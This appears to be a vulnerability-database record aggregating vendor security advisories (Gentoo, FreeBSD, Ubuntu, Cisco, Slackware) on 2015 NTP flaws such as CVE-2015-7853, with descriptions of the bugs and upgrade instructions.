"CVE-2017-5753" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-21T00:00:00", "db": "CERT/CC", "id": "VU#180049" }, { "date": "2018-01-04T00:00:00", "db": "CNVD", "id": "CNVD-2018-00304" }, { "date": "2018-01-04T00:00:00", "db": "VULHUB", "id": "VHN-113956" }, { "date": "2018-01-03T00:00:00", "db": "BID", "id": "102371" }, { "date": "2018-01-06T18:01:06", "db": "PACKETSTORM", "id": "145718" }, { "date": "2018-01-23T04:32:09", "db": "PACKETSTORM", "id": "146017" }, { "date": "2018-05-03T01:31:56", "db": "PACKETSTORM", "id": "147451" }, { "date": "2018-01-04T01:20:35", "db": "PACKETSTORM", "id": "145641" }, { "date": "2018-01-09T17:32:51", "db": "PACKETSTORM", "id": "145774" }, { "date": "2018-01-09T17:13:40", "db": "PACKETSTORM", "id": "145762" }, { "date": "2018-03-15T15:54:32", "db": "PACKETSTORM", "id": "146771" }, { "date": "2018-01-04T17:53:07", "db": "PACKETSTORM", "id": "145666" }, { "date": "2018-01-24T00:28:48", "db": "PACKETSTORM", "id": "146026" }, { "date": "2018-02-09T15:01:04", "db": "PACKETSTORM", "id": "146315" }, { "date": "2018-01-11T01:02:22", "db": "PACKETSTORM", "id": "145837" }, { "date": "2018-01-04T00:52:58", "db": "PACKETSTORM", "id": "145635" }, { "date": "2018-01-04T13:29:00.257000", "db": "NVD", "id": "CVE-2017-5753" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-06-19T00:00:00", "db": "CERT/CC", "id": "VU#180049" }, { "date": "2018-01-08T00:00:00", "db": "CNVD", "id": "CNVD-2018-00304" }, { "date": "2021-11-23T00:00:00", "db": "VULHUB", "id": "VHN-113956" }, { "date": "2019-04-17T06:00:00", "db": "BID", "id": "102371" }, { "date": "2021-11-23T22:14:00.490000", "db": "NVD", "id": "CVE-2017-5753" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "102371" }, { "db": "PACKETSTORM", "id": "146017" }, { "db": "PACKETSTORM", "id": "145774" }, { "db": "PACKETSTORM", "id": "146771" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks", "sources": [ { "db": "CERT/CC", "id": "VU#180049" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "102371" } ], "trust": 0.3 } }
var-201708-0036
Vulnerability from variot
The datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value. NTP Is vulnerable to a buffer error.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Network Time Protocol is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions. Versions prior to NTP 4.2.8p4 and 4.3.x prior to 4.3.77 are vulnerable.
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
============================================================================= FreeBSD-SA-15:25.ntp Security Advisory The FreeBSD Project
Topic: Multiple vulnerabilities of ntp
Category: contrib Module: ntp Announced: 2015-10-26 Credits: Network Time Foundation Affects: All supported versions of FreeBSD. Corrected: 2015-10-26 11:35:40 UTC (stable/10, 10.2-STABLE) 2015-10-26 11:36:55 UTC (releng/10.2, 10.2-RELEASE-p6) 2015-10-26 11:37:31 UTC (releng/10.1, 10.1-RELEASE-p23) 2015-10-26 11:36:40 UTC (stable/9, 9.3-STABLE) 2015-10-26 11:42:25 UTC (releng/9.3, 9.3-RELEASE-p29) CVE Name: CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704, CVE-2015-7848, CVE-2015-7849, CVE-2015-7850, CVE-2015-7851, CVE-2015-7852, CVE-2015-7853, CVE-2015-7854, CVE-2015-7855, CVE-2015-7871
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/.
I. Background
The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source.
II. Problem Description
Crypto-NAK packets can be used to cause ntpd(8) to accept time from an unauthenticated ephemeral symmetric peer by bypassing the authentication required to mobilize peer associations. [CVE-2015-7871] FreeBSD 9.3 and 10.1 are not affected.
If ntpd(8) is fed a crafted mode 6 or mode 7 packet containing an unusual long data value where a network address is expected, the decodenetnum() function will abort with an assertion failure instead of simply returning a failure condition. [CVE-2015-7855]
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd(8) that may cause it to crash, with the hypothetical possibility of a small code injection. [CVE-2015-7854]
A negative value for the datalen parameter will overflow a data buffer. NTF's ntpd(8) driver implementations always set this value to 0 and are therefore not vulnerable to this weakness. If you are running a custom refclock driver in ntpd(8) and that driver supplies a negative value for datalen (no custom driver of even minimal competence would do this) then ntpd would overflow a data buffer. It is even hypothetically possible in this case that instead of simply crashing ntpd the attacker could effect a code injection attack. [CVE-2015-7853]
If an attacker can figure out the precise moment that ntpq(8) is listening for data and the port number it is listening on or if the attacker can provide a malicious instance ntpd(8) that victims will connect to then an attacker can send a set of crafted mode 6 response packets that, if received by ntpq(8), can cause ntpq(8) to crash. [CVE-2015-7852]
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd that may cause ntpd(8) to overwrite files. [CVE-2015-7851]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can send a set of packets to ntpd that will cause it to crash and/or create a potentially huge log file. Specifically, the attacker could enable extended logging, point the key file at the log file, and cause what amounts to an infinite loop. [CVE-2015-7850]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.
If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd was configured to disable authentication, then an attacker can send a set of packets to ntpd that may cause a crash or theoretically perform a code injection attack. [CVE-2015-7849]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration.
If ntpd(8) is configured to enable mode 7 packets, and if the use of mode 7 packets is not properly protected thru the use of the available mode 7 authentication and restriction mechanisms, and if the (possibly spoofed) source IP address is allowed to send mode 7 queries, then an attacker can send a crafted packet to ntpd that will cause it to crash. [CVE-2015-7848]. The default configuration of ntpd(8) within FreeBSD does not allow mode 7 packets.
If ntpd(8) is configured to use autokey, then an attacker can send packets to ntpd that will, after several days of ongoing attack, cause it to run out of memory. [CVE-2015-7701]. The default configuration of ntpd(8) within FreeBSD does not use autokey.
If ntpd(8) is configured to allow for remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password, it's possible for an attacker to use the "pidfile" or "driftfile" directives to potentially overwrite other files. [CVE-2015-5196]. The default configuration of ntpd(8) within FreeBSD does not allow remote configuration
An ntpd(8) client that honors Kiss-of-Death responses will honor KoD messages that have been forged by an attacker, causing it to delay or stop querying its servers for time updates. Also, an attacker can forge packets that claim to be from the target and send them to servers often enough that a server that implements KoD rate limiting will send the target machine a KoD response to attempt to reduce the rate of incoming packets, or it may also trigger a firewall block at the server for packets from the target machine. For either of these attacks to succeed, the attacker must know what servers the target is communicating with. An attacker can be anywhere on the Internet and can frequently learn the identity of the target's time source by sending the target a time query. [CVE-2015-7704]
The fix for CVE-2014-9750 was incomplete in that there were certain code paths where a packet with particular autokey operations that contained malicious data was not always being completely validated. Receipt of these packets can cause ntpd to crash. [CVE-2015-7702]. The default configuration of ntpd(8) within FreeBSD does not use autokey.
III. Impact
An attacker which can send NTP packets to ntpd(8), which uses cryptographic authentication of NTP data, may be able to inject malicious time data causing the system clock to be set incorrectly. [CVE-2015-7871]
An attacker which can send NTP packets to ntpd(8), can block the communication of the daemon with time servers, causing the system clock not being synchronized. [CVE-2015-7704]
An attacker which can send NTP packets to ntpd(8), can remotely crash the daemon, sending malicious data packet. [CVE-2015-7855] [CVE-2015-7854] [CVE-2015-7853] [CVE-2015-7852] [CVE-2015-7849] [CVE-2015-7848]
An attacker which can send NTP packets to ntpd(8), can remotely trigger the daemon to overwrite its configuration files. [CVE-2015-7851] [CVE-2015-5196]
IV. Workaround
No workaround is available, but systems not running ntpd(8) are not affected. Network administrators are advised to implement BCP-38, which helps to reduce risk associated with the attacks.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
The ntpd service has to be restarted after the update. A reboot is recommended but not required.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
The ntpd service has to be restarted after the update. A reboot is recommended but not required.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.2]
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.bz2
bunzip2 ntp-102.patch.bz2
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.asc
gpg --verify ntp-102.patch.asc
[FreeBSD 10.1]
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.bz2
bunzip2 ntp-101.patch.bz2
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.asc
gpg --verify ntp-101.patch.asc
[FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.bz2
bunzip2 ntp-93.patch.bz2
fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.asc
gpg --verify ntp-93.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
find contrib/ntp -type f -empty -delete
c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html.
d) For 9.3-RELEASE and 10.1-RELEASE an update to /etc/ntp.conf is recommended, which can be done with help of the mergemaster(8) tool on 9.3-RELEASE and with help of the etcupdate(8) tool on 10.1-RELEASE.
Restart the ntpd(8) daemon, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/9/ r289998 releng/9.3/ r290001 stable/10/ r289997 releng/10.1/ r290000 releng/10.2/ r289999
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN
VII. References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871
The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-15:25.ntp.asc -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIcBAEBAgAGBQJWLhOJAAoJEO1n7NZdz2rn91wP/2GwEt1boNQq2a7nYzv/mS5D sYKkIi7o+2yr2BLXvtc3O7c9QC3/YeGsza9DTRqndcY572SWvRgtkFstMTTm8IV/ RVlIE40gVR3tex0zo7BiD7uKUrxWxWcpwMbE5dzlE+vSybyyj0dSSkwUHJjrbJoA RmyNuEEUhQn5sRCg6qJv/PLp2G7BcYAasKScukjm7QnLP2kq/tvM9mcqwfh2tadM 7kbf8uq+ykvsRzctaDnxQaB5+zJxBQYJjBelxQfIkNek0XGfdj3sRwISeFznbllq mOLTIBaFiuEtHtusO7MKKavMgS5CQJOvuuvd/l3NY1MnxC6X/1SWig9KIKDIn/hv q8dsnq7LLx+tO6Cv4Dub7EbC2ZP3xXGOC4Ie02z8bTZnbX7iwyPUidQQqtU9ra15 rxzFcZnBxu+yyMNJVsV2qVV/r9OycgKxWlEELC1wYrK9fKfvLdA5aEGjDeU1Z+s6 JS2zKr0t4F2bMrCsjYP1lQD8sHkCVjwJk+IJU/slcwSajDjBNlMH0yBxGYE1ETIZ qMF7/PAkLe8V78pdYmXw9pcaPyhI+ihPLnNrdhX8AI2RX5jDK7IuUNJeUM04UrVB 8N+mMwgamcuCPWNNyXaL0bz21fexZOuhHmU+B8Yn3SFX5O5b/r9gGvrjo8ei8jOk EUlBT3ViDhHNrI7PTaiI =djPm -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2783-1 October 27, 2015
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. (CVE-2015-5146)
Miroslav Lichvar discovered that NTP incorrectly handled logconfig directives. (CVE-2015-5194)
Miroslav Lichvar discovered that NTP incorrectly handled certain statistics types. (CVE-2015-5195)
Miroslav Lichvar discovered that NTP incorrectly handled certain file paths. (CVE-2015-5196, CVE-2015-7703)
Miroslav Lichvar discovered that NTP incorrectly handled certain packets. (CVE-2015-5219)
Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled restarting after hitting a panic threshold. (CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)
It was discovered that NTP incorrectly handled memory when processing certain autokey messages. (CVE-2015-7701)
Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled rate limiting. A remote attacker could possibly use this issue to cause clients to stop updating their clock. (CVE-2015-7704, CVE-2015-7705)
Yves Younan discovered that NTP incorrectly handled logfile and keyfile directives. (CVE-2015-7850)
Yves Younan and Aleksander Nikolich discovered that NTP incorrectly handled ascii conversion. (CVE-2015-7852)
Yves Younan discovered that NTP incorrectly handled reference clock memory. (CVE-2015-7853)
John D "Doug" Birdwell discovered that NTP incorrectly handled decoding certain bogus values. (CVE-2015-7855)
Stephen Gray discovered that NTP incorrectly handled symmetric association authentication. (CVE-2015-7871)
In the default installation, attackers would be isolated by the NTP AppArmor profile.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: ntp 1:4.2.6.p5+dfsg-3ubuntu8.1
Ubuntu 15.04: ntp 1:4.2.6.p5+dfsg-3ubuntu6.2
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.6
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2783-1 CVE-2015-5146, CVE-2015-5194, CVE-2015-5195, CVE-2015-5196, CVE-2015-5219, CVE-2015-5300, CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704, CVE-2015-7705, CVE-2015-7850, CVE-2015-7852, CVE-2015-7853, CVE-2015-7855, CVE-2015-7871
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6 . Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to create a denial of service (DoS) condition or modify the time being advertised by a device acting as a network time protocol (NTP) server.
On October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server's advertised time. The vulnerabilities covered in this document are as follows:
CVE-2015-7691 - Denial of Service AutoKey Malicious Message CVE-2015-7692 - Denial of Service AutoKey Malicious Message CVE-2015-7701 - Denial of Service CRYPTO_ASSOC Memory Leak CVE-2015-7702 - Denial of Service AutoKey Malicious Message CVE-2015-7703 - Configuration Directive File Overwrite Vulnerability CVE-2015-7704 - Denial of Service by Spoofed Kiss-o'-Death CVE-2015-7705 - Denial of Service by Priming the Pump CVE-2015-7848 - Network Time Protocol ntpd multiple integer overflow read access violations CVE-2015-7849 - Network Time Protocol Trusted Keys Memory Corruption Vulnerability CVE-2015-7850 - Network Time Protocol Remote Configuration Denial of Service Vulnerability CVE-2015-7851 - Network Time Protocol ntpd saveconfig Directory Traversal Vulnerability CVE-2015-7852 - Network Time Protocol ntpq atoascii Memory Corruption Vulnerability CVE-2015-7853 - Network Time Protocol Reference Clock Memory Corruption Vulnerability CVE-2015-7854 - Network Time Protocol Password Length Memory Corruption Vulnerability CVE-2015-7855 - Denial of Service Long Control Packet Message CVE-2015-7871 - NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability
Additional details on each of the vulnerabilities can be found at the following links:
Official Security Advisory from ntp.org: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities Boston University: http://www.cs.bu.edu/~goldbe/NTPattack.html Cisco TALOS: http://talosintel.com/vulnerability-reports/
Cisco will release software updates that address these vulnerabilities.
Workarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several low and medium severity vulnerabilities. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz
Slackware 13.1 package: e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz
Slackware 13.37 package: 5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz
Slackware 14.0 package: 39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz
Slackware 14.1 package: 1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz
Slackware -current package: 81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz
Slackware x86_64 -current package: 8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
